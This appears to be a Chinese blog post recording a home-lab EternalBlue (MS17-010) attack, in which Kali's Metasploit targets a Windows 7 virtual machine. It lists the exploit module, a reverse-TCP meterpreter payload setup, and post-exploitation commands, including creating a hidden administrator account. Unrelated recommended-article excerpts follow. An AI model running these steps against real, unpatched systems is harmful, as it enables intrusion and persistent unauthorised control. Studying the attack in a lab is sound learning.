网络攻防——永恒之蓝

1.引言

    让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安,积累积累一些有趣的玩意儿。然后,自己不是专业的,也不是为了工作,可能会查阅大佬的博文,然后把概念借鉴过来,会留下参考链接的,如果博主不同意引用直接评论我会删除的。好,引用张宇一句话:直接来吧。

2.永恒之蓝定义

    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。之后在windows7以上的版本中不再出现了。当年的攻击效果如下(找网安大佬要的图):
在这里插入图片描述

3.SMB协议

    SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.windows7版本说明

    我们都知道家庭版和专业版,直白点就是普通和高级,普通提供的功能有限。但是windows7里面还有一个旗舰版。其实对于专业版和旗舰版,两者只是功能上有少量差别,如果把Windows7旗舰版的BitLocker功能(BitLocker驱动器加密通过加密Windows操作系统卷上存储的所有数据可以更好地保护计算机中的数据)和35种语言之间任意切换功能去掉其实就等于是专业版。

4.攻击实例

4.1攻击者和被攻击者展示

(1)攻击机:kali
在这里插入图片描述

(2)靶机:windows7旗舰版
在这里插入图片描述

4.2详细攻击过程

(1)首先通过ifconfigipconfig分别查看kali和windows7的ip地址:

kali:192.168.58.132
windows7:192.168.58.134

(2)利用kali ping windows7,发现ping不通,于是关闭windows7的防火墙,再ping就能够ping通了,说明二者能够建立连接;
(3)输入如下指令打开kali数据库:

service postgresql status //查看数据库开启状态
service postgresql start //开启数据库
service postgresql status //再次查看数据库开启状态,确认开启

开启效果如下:
在这里插入图片描述
(4)数据库初始化:

msfdb init

(5)启动msf:

msfconsole

(6)搜索ms17_010漏洞(也就是永恒之蓝漏洞):

search ms17_010

    这个时候系统会展示kali中可以使用的扫描模块:
在这里插入图片描述
(7)选择扫描模块:

use auxiliary/scanner/smb/smb_ms17_010

(8)开始扫描:

use exploit/windows/smb/ms17_010_eternalblue

(9)设置本次扫描基本配置:

//设置扫描的靶机ip
set rhost 192.168.58.134
//设置携带的攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
//设置监听的攻击机
set lhost 192.168.58.132

(10)利用exploit进行攻击:

exploit

    回到windows7中查看,虽然关闭了防火墙,但是受到永恒之蓝攻击之后windows7还是能够报危险提示的:
在这里插入图片描述
接下来可以进行一系列攻击了,给出几个例子:
(1)查看系统信息:

sysinfo

(2)创造出一个新的管理员出来

//创建用户
net user hack 123456 /add
//将用户升级为管理员
net localgroup administrators hack /add 

    但是其实有点尬,这样用户就能一眼看出来有多个用户了:
在这里插入图片描述
    由于第一个用户自带管理员权限,因此,如果用户很懂的话,可以直接在管理用户的地方删除用户:
在这里插入图片描述
    当然上面介绍的可能太专业了,之前在kali的基本使用中介绍了使用webcam_listwebcam_stream打开摄像头,但是虚拟机的旗舰版windows7直接提示没有摄像头,绷不住了。
    但是可以使用screenshot截个图。截图之后会提示文件的位置,但是这里直接找了半天都没看到,和前面介绍的windows攻击程序的生成位置一样,可能是出现在root目录下,因此,桌面右键,open as Root然后去根目录下查看,注意直接切换用户是不能够进入root的,会直接提示密码错误:
在这里插入图片描述

4.3接下来尝试攻击一下windows10

    所有操作一样,只是换一下ip地址:
在这里插入图片描述
确实攻击不了。

5.参考文献

(1)永恒之蓝漏洞利用及攻击

  • 35
    点赞
  • 204
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
网络安全攻防演练防守方方案 网络安全攻防演练防守方方案全文共26页,当前为第1页。网络安全攻防演练防守方方案全文共26页,当前为第1页。 网络安全攻防演练防守方方案全文共26页,当前为第1页。 网络安全攻防演练防守方方案全文共26页,当前为第1页。 目录 1、攻防演习概述 2 1.1.攻防演习背景 2 1.2.攻击角度看防守 2 1.3.演习防守方法论 3 2.组织及职责分工 4 2.1.攻防演习组织 4 2.2职责分工 5 2.3.各阶段工作任务 6 3.防守工作方案 9 3.1.第一阶段:准备阶段 9 3.1.1.防守方案编制 10 3.1.2.防守工作启动会 10 3.1.3.重要工作开展 10 3.2.第二阶段:安全自查和整改阶段 11 3.2.1.网络安全检查 11 3.2.2.主机安全检查 12 3.2.3.应用系统安全检查 12 3.2.4.运维终端安全检查 13 3.2.5.日志审计 13 3.2.6.备份效性检查 14 3.2.7.安全意识培训 14 3.2.8.安全整改加固 15 3.3.第三阶段:攻防预演习阶段 15 3.3.1.预演习启动会 15 3.3.2.授权及备案 16 3.3.3.预演习平台 16 3.3.4.预演习攻击 16 3.3.5.预演习防守 17 3.3.6 预演习总结 18 3.4 第四阶段:正式防护阶段 18 3.4.1.安全事件实时监测 19 3.4.2.事件分析与处置 19 3.4.3.防护总结与整改 19 4.演习组织及工作计划 20 4.1.演习工作单位和组织分工 20 4.1.1.明确参演单位 20 4.1.2.演习工作组织架构 20 4.1.3.演习工作职责分工 20 4.2.初步工作计划 21 5.流量安全监测分析系统部署 23 6.主机加固实施 25 网络安全攻防演练防守方方案全文共26页,当前为第2页。网络安全攻防演练防守方方案全文共26页,当前为第2页。1、攻防演习概述 网络安全攻防演练防守方方案全文共26页,当前为第2页。 网络安全攻防演练防守方方案全文共26页,当前为第2页。 1.1.攻防演习背景 网络安全实战攻防演习(以下简称"攻防演习")是以获取目标系统的最高控制权为目标,由多领域安全专家组成攻击队,在保障业务系统安全的前提下,采用"不限攻击路径,不限制攻击手段"的攻击方式,而形成的"有组织"的网络攻击行为。 攻防演习通常是在真实环境下对参演单位目标系统进行可控、可审计的网络安全实战攻击,通过攻防演习检验参演单位的安全防护和应急处置能力,提高网络安全的综合防控能力。 近几年我国较大规模的攻防演习主要包括公安机关组织的针对关键信息基础设施的攻防演习、各部委组织的对各省和直属单位重要系统的攻防演习和大型企业组织的对下属单位重要系统的攻防演习。其中,公安部组织的"护网行动"是面向国家重要信息系统和关键信息基础设施的网络安全实战演习,通过实战网络攻击的形式检验我国关键信息基础设施安全防护和应急处置能力,"护网行动"已开展了3年,取得了十分显著的效果,督促各单位有效提升了网络安全防护水平。 1.2.攻击角度看防守 在攻防演习中,为充分检验参演单位及目标系统的安全防护、监测和应急处置能力,演习组织方通常会选择由经验丰富的安全专家组成攻击队开展网络攻击,在确保不影响业务的前提下,选择一切可利用的资源和手段,采用多变、灵活、隐蔽的攻击力求取得最大战果参演单位作为防守方,面对"隐蔽"的网络攻击,如何才能有效防御呢?"知彼知己,百战不殆",只有了解攻击方是如何开展攻击的,才能根据攻击特点建立完善的安全防护体系,有效抵御网络攻击。攻击方在组织入侵攻击时,通常会首先制定攻击策略、规划攻击线路,攻击者分工合作,力争在短时间内取得最大战果,常见的攻击步骤为信息收集、漏洞分析、渗透攻击和后渗透攻击 网络安全攻防演练防守方方案全文共26页,当前为第3页。网络安全攻防演练防守方方案全文共26页,当前为第3页。1.3.演习防守方法论 网络安全攻防演练防守方方案全文共26页,当前为第3页。 网络安全攻防演练防守方方案全文共26页,当前为第3页。 "护网"行动的防护应是基于"战时"的防护工作模式,根据护网行动要求,会有防守方和攻击方,同时对防守方设计了加分事宜,基于我司长期积累的攻击方的攻击路径和攻击手段,我司建议采用在主动防御架构下,建立基于可持续监测分析和响应的协同防护模式,分成事前阶段、事中阶段和时候阶段。 事前阶段是针对护网行动的前期准备阶段,重点是协助客户模式"护网"进行实战预演习,旨在发现隐患、检验防护和协同应急处置流程,同时协助客户减少被攻击面,开展专项安全检测,重点针对"攻击方"可能利用的安全漏洞进行安全检测,并提供安全建议。客户要基于已有的安全运营工作,进一步加强网络安全
网络攻防技术与实战——深入理解信息安全防护体系》是一本介绍网络攻防技术和信息安全防护的书籍。该书通过系统地介绍了网络攻防技术和实战经验,帮助读者深入理解信息安全防护的相关知识。 首先,该书对网络攻防技术进行了详细的介绍。它从网络攻击的基本原理和分类开始,介绍了常见的攻击手段,如拒绝服务攻击、病毒蠕虫和木马攻击等。接着,书籍重点探讨了不同防护技术的原理和实施方法,包括访问控制技术、入侵检测与防御技术、流量分析技术等。这些内容可以帮助读者了解网络攻击的过程和方法,为实施信息安全防护奠定基础。 其次,该书介绍了信息安全防护体系。作者将信息安全防护分为多个层次,包括网络层、主机层和应用层等,针对不同层次的安全防护提供了相应的解决方案。读者可以学习如何构建强大的信息安全防护体系,以保护企业和个人的敏感数据,并降低信息泄露和损失的风险。 另外,该书还提供了丰富的实战经验和案例分析。通过分析真实的攻击事件和防御措施,读者可以更好地理解信息安全防护的实践和应用。此外,书中还介绍了一些常见的安全工具和平台,如入侵检测系统和安全事件响应平台等,帮助读者更加高效地进行信息安全防护工作。 总之,《网络攻防技术与实战——深入理解信息安全防护体系》是一本对网络攻防技术和信息安全防护进行深入讲解的书籍。它提供了全面而系统的知识,帮助读者理解攻击原理、掌握防护技术,并且通过实战经验和案例分析提供了实用的指导。读者可以通过该书提升自己在信息安全领域的能力和水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凌空暗羽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值